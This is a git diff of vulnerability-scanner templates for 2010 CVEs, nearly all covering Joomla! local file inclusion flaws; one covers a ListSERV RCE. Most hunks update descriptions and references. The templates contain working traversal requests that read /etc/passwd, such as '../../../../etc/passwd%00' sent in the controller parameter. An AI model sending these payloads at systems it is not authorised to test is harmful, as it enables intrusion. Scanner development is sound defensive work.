"root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1533.yaml b/cves/2010/CVE-2010-1533.yaml index 03ef38a6ea..0ca3569213 100644 --- a/cves/2010/CVE-2010-1533.yaml +++ b/cves/2010/CVE-2010-1533.yaml @@ -4,24 +4,26 @@ info: name: Joomla! Component TweetLA 1.0.1 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12142 - https://www.cvedetails.com/cve/CVE-2010-1533 + - http://secunia.com/advisories/39258 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1533 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1534.yaml b/cves/2010/CVE-2010-1534.yaml index 871c657677..7e5bf68a10 100644 --- a/cves/2010/CVE-2010-1534.yaml +++ b/cves/2010/CVE-2010-1534.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component Shoutbox Pro - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12067 - https://www.cvedetails.com/cve/CVE-2010-1534 + - http://www.securityfocus.com/bid/39213 + - http://secunia.com/advisories/39352 + remediation: Upgrade to a supported version + classification: + cve-id: CVE-2010-1534 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1535.yaml b/cves/2010/CVE-2010-1535.yaml index f4ad1e3c80..9b6bbe7ec5 100644 --- a/cves/2010/CVE-2010-1535.yaml +++ b/cves/2010/CVE-2010-1535.yaml @@ -4,24 +4,26 @@ info: name: Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12151 - https://www.cvedetails.com/cve/CVE-2010-1535 + - http://secunia.com/advisories/39254 + classification: + cve-id: CVE-2010-1535 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/24 diff --git a/cves/2010/CVE-2010-1540.yaml b/cves/2010/CVE-2010-1540.yaml index b0afe05f6e..50d5e1c02d 100644 --- a/cves/2010/CVE-2010-1540.yaml +++ b/cves/2010/CVE-2010-1540.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component com_blog - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. - reference: | + description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. + reference: - https://www.exploit-db.com/exploits/11625 - https://www.cvedetails.com/cve/CVE-2010-1540 + - http://secunia.com/advisories/38777 + - http://www.securityfocus.com/bid/38530 + classification: + cve-id: CVE-2010-1540 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/06 diff --git a/cves/2010/CVE-2010-1601.yaml b/cves/2010/CVE-2010-1601.yaml index 40716c0829..492c29e5d9 100644 --- a/cves/2010/CVE-2010-1601.yaml +++ b/cves/2010/CVE-2010-1601.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component JA Comment - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12236 - https://www.cvedetails.com/cve/CVE-2010-1601 + - http://secunia.com/advisories/39472 + - http://packetstormsecurity.org/1004-exploits/joomlajacomment-lfi.txt + classification: + cve-id: CVE-2010-1601 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/24 diff --git a/cves/2010/CVE-2010-1602.yaml b/cves/2010/CVE-2010-1602.yaml index 9a766ef802..9a48cb7693 100644 --- a/cves/2010/CVE-2010-1602.yaml +++ b/cves/2010/CVE-2010-1602.yaml @@ -4,24 +4,26 @@ info: name: Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12283 - https://www.cvedetails.com/cve/CVE-2010-1602 + - http://packetstormsecurity.org/1004-exploits/joomlazimbcomment-lfi.txt + classification: + cve-id: CVE-2010-1602 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/30 diff --git a/cves/2010/CVE-2010-1603.yaml b/cves/2010/CVE-2010-1603.yaml index dc2b52c09b..0ec6686201 100644 --- a/cves/2010/CVE-2010-1603.yaml +++ b/cves/2010/CVE-2010-1603.yaml @@ -4,24 +4,28 @@ info: name: Joomla! Component ZiMBCore 0.1 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12284 - https://www.cvedetails.com/cve/CVE-2010-1603 + - http://www.securityfocus.com/bid/39546 + - http://www.vupen.com/english/advisories/2010/0931 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1603 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1607.yaml b/cves/2010/CVE-2010-1607.yaml index 81f69a9578..54e1be5e91 100644 --- a/cves/2010/CVE-2010-1607.yaml +++ b/cves/2010/CVE-2010-1607.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component WMI 1.5.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12316 - https://www.cvedetails.com/cve/CVE-2010-1607 + - http://www.securityfocus.com/bid/39608 + - http://secunia.com/advisories/39539 + classification: + cve-id: CVE-2010-1607 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/07 diff --git a/cves/2010/CVE-2010-1653.yaml b/cves/2010/CVE-2010-1653.yaml index fdc3e5d2a7..737487cfd0 100644 --- a/cves/2010/CVE-2010-1653.yaml +++ b/cves/2010/CVE-2010-1653.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component Graphics 1.0.6 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information. + description: A directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12430 - https://www.cvedetails.com/cve/CVE-2010-1653 + - http://packetstormsecurity.org/1004-exploits/joomlagraphics-lfi.txt + - http://www.securityfocus.com/bid/39743 + classification: + cve-id: CVE-2010-1653 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/cves/2010/CVE-2010-1657.yaml b/cves/2010/CVE-2010-1657.yaml index b3bc8509e7..4c62d5a31c 100644 --- a/cves/2010/CVE-2010-1657.yaml +++ b/cves/2010/CVE-2010-1657.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component SmartSite 1.0.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2010-1657 - https://www.exploit-db.com/exploits/12428 - - https://www.cvedetails.com/cve/CVE-2010-1657 + - http://www.vupen.com/english/advisories/2010/1006 + - http://www.securityfocus.com/bid/39740 + classification: + cve-id: CVE-2010-1657 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/27 diff --git a/cves/2010/CVE-2010-1658.yaml b/cves/2010/CVE-2010-1658.yaml index 1996fbeb69..aae12dd013 100644 --- a/cves/2010/CVE-2010-1658.yaml +++ b/cves/2010/CVE-2010-1658.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12427 - https://www.cvedetails.com/cve/CVE-2010-1658 + - http://www.vupen.com/english/advisories/2010/1007 + - http://secunia.com/advisories/39600 + classification: + cve-id: CVE-2010-1658 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/27 diff --git a/cves/2010/CVE-2010-1659.yaml b/cves/2010/CVE-2010-1659.yaml index fb4d569289..90e20630f5 100644 --- a/cves/2010/CVE-2010-1659.yaml +++ b/cves/2010/CVE-2010-1659.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12426 - - https://www.cvedetails.com/cve/CVE-2010-1659 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1659 + - http://www.securityfocus.com/bid/39739 + - http://www.exploit-db.com/exploits/12426 + classification: + cve-id: CVE-2010-1659 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/28 diff --git a/cves/2010/CVE-2010-1714.yaml b/cves/2010/CVE-2010-1714.yaml index 6ff7a55726..1dacc59f33 100644 --- a/cves/2010/CVE-2010-1714.yaml +++ b/cves/2010/CVE-2010-1714.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component Arcade Games 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12168 - https://www.cvedetails.com/cve/CVE-2010-1714 + - http://packetstormsecurity.org/1004-exploits/joomlaarcadegames-lfi.txt + - http://secunia.com/advisories/39413 + classification: + cve-id: CVE-2010-1714 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/28 diff --git a/cves/2010/CVE-2010-1715.yaml b/cves/2010/CVE-2010-1715.yaml index 6eabdff378..a97738faf3 100644 --- a/cves/2010/CVE-2010-1715.yaml +++ b/cves/2010/CVE-2010-1715.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information. + description: A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12174 - https://www.cvedetails.com/cve/CVE-2010-1715 + - http://www.osvdb.org/63659 + - http://packetstormsecurity.org/1004-exploits/joomlaonlineexam-lfi.txt + classification: + cve-id: CVE-2010-1715 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/cves/2010/CVE-2010-1717.yaml b/cves/2010/CVE-2010-1717.yaml index cb08bb4b40..890db1d0fa 100644 --- a/cves/2010/CVE-2010-1717.yaml +++ b/cves/2010/CVE-2010-1717.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component iF surfALERT 1.2 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12291 - https://www.cvedetails.com/cve/CVE-2010-1717 + - http://secunia.com/advisories/39526 + - http://www.vupen.com/english/advisories/2010/0924 + classification: + cve-id: CVE-2010-1717 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/01 diff --git a/cves/2010/CVE-2010-1718.yaml b/cves/2010/CVE-2010-1718.yaml index 5ebbc5844c..330a7e33cf 100644 --- a/cves/2010/CVE-2010-1718.yaml +++ b/cves/2010/CVE-2010-1718.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12282 - https://www.cvedetails.com/cve/CVE-2010-1718 + - http://secunia.com/advisories/39521 + - http://www.securityfocus.com/bid/39545 + classification: + cve-id: CVE-2010-1718 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/01 diff --git a/cves/2010/CVE-2010-1719.yaml b/cves/2010/CVE-2010-1719.yaml index b41a153cae..5d51b37d14 100644 --- a/cves/2010/CVE-2010-1719.yaml +++ b/cves/2010/CVE-2010-1719.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12233 - https://www.cvedetails.com/cve/CVE-2010-1719 + - http://osvdb.org/63806 + - http://www.exploit-db.com/exploits/12233 + classification: + cve-id: CVE-2010-1719 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/01 diff --git a/cves/2010/CVE-2010-1722.yaml b/cves/2010/CVE-2010-1722.yaml index 6290c4d973..9fb0c0d11a 100644 --- a/cves/2010/CVE-2010-1722.yaml +++ b/cves/2010/CVE-2010-1722.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component Online Market 2.x - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12177 - https://www.cvedetails.com/cve/CVE-2010-1722 + - http://secunia.com/advisories/39409 + - http://www.exploit-db.com/exploits/12177 + classification: + cve-id: CVE-2010-1722 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/01 diff --git a/cves/2010/CVE-2010-1723.yaml b/cves/2010/CVE-2010-1723.yaml index 4b5060444b..f548d05670 100644 --- a/cves/2010/CVE-2010-1723.yaml +++ b/cves/2010/CVE-2010-1723.yaml @@ -4,24 +4,26 @@ info: name: Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12289 - https://www.cvedetails.com/cve/CVE-2010-1723 + - http://secunia.com/advisories/39524 + classification: + cve-id: CVE-2010-1723 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/01 diff --git a/cves/2010/CVE-2010-1858.yaml b/cves/2010/CVE-2010-1858.yaml index 084d817de4..6b922c1303 100644 --- a/cves/2010/CVE-2010-1858.yaml +++ b/cves/2010/CVE-2010-1858.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component SMEStorage - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + description: A directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11853 - https://www.cvedetails.com/cve/CVE-2010-1858 + - http://www.securityfocus.com/bid/38911 + - http://packetstormsecurity.org/1003-exploits/joomlasmestorage-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1858 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1870.yaml b/cves/2010/CVE-2010-1870.yaml index 75e15e4977..c1f2a8656d 100644 --- a/cves/2010/CVE-2010-1870.yaml +++ b/cves/2010/CVE-2010-1870.yaml @@ -4,16 +4,18 @@ info: name: ListSERV Maestro <= 9.0-8 RCE author: b0yd severity: info - description: Struts-based OGNL remote code execution in ListSERV Maestro before and including version 9.0-8. + description: A struts-based OGNL remote code execution vulnerability exists in ListSERV Maestro before and including version 9.0-8. reference: - https://www.securifera.com/advisories/sec-2020-0001/ - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt - tags: rce,listserv,ognl,cves,cve2010 + - https://www.exploit-db.com/exploits/14360 + - http://confluence.atlassian.com/display/FISHEYE/FishEye+Security+Advisory+2010-06-16 classification: cvss-metrics: AV:N/AC:L/Au:N/C:N/I:P/A:N - cvss-score: 5.0 + cvss-score: 5 cve-id: CVE-2010-1870 cwe-id: CWE-917 + tags: cve,cve2010,rce,listserv,ognl requests: - method: GET @@ -28,3 +30,5 @@ requests: - 'LISTSERV Maestro\s+[5678]' - 'Administration Hub 9\.0-[123456780]' - 'Administration Hub [5678]' + +# Enhanced by mp on 2022/03/20 diff --git a/cves/2010/CVE-2010-1873.yaml b/cves/2010/CVE-2010-1873.yaml deleted file mode 100644 index 4331b8702c..0000000000 --- a/cves/2010/CVE-2010-1873.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1873 - -info: - name: Joomla! Component Jvehicles - Local File Inclusion - author: daffainfo - severity: high - description: SQL injection vulnerability in the Jvehicles (com_jvehicles) component 1.0, 2.0, and 2.1111 for Joomla! allows remote attackers to execute arbitrary SQL commands via the aid parameter in an agentlisting action to index.php. - reference: - - https://www.exploit-db.com/exploits/11997 - - https://www.cvedetails.com/cve/CVE-2010-1873 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1875.yaml b/cves/2010/CVE-2010-1875.yaml index 4db56ab46e..a28222ddb1 100644 --- a/cves/2010/CVE-2010-1875.yaml +++ b/cves/2010/CVE-2010-1875.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component Property - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11851 - https://www.cvedetails.com/cve/CVE-2010-1875 + - http://secunia.com/advisories/39074 + - http://www.securityfocus.com/bid/38912 + classification: + cve-id: CVE-2010-1875 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/cves/2010/CVE-2010-1878.yaml b/cves/2010/CVE-2010-1878.yaml index 551f28d4a6..9e048e4fa4 100644 --- a/cves/2010/CVE-2010-1878.yaml +++ b/cves/2010/CVE-2010-1878.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component OrgChart 1.0.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12317 - https://www.cvedetails.com/cve/CVE-2010-1878 + - http://www.securityfocus.com/bid/39606 + - http://packetstormsecurity.org/1004-exploits/joomlaorgchart-lfi.txt + classification: + cve-id: CVE-2010-1878 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/17 diff --git a/cves/2010/CVE-2010-1952.yaml b/cves/2010/CVE-2010-1952.yaml index 5e71f4a39f..33bb5efa53 100644 --- a/cves/2010/CVE-2010-1952.yaml +++ b/cves/2010/CVE-2010-1952.yaml @@ -4,24 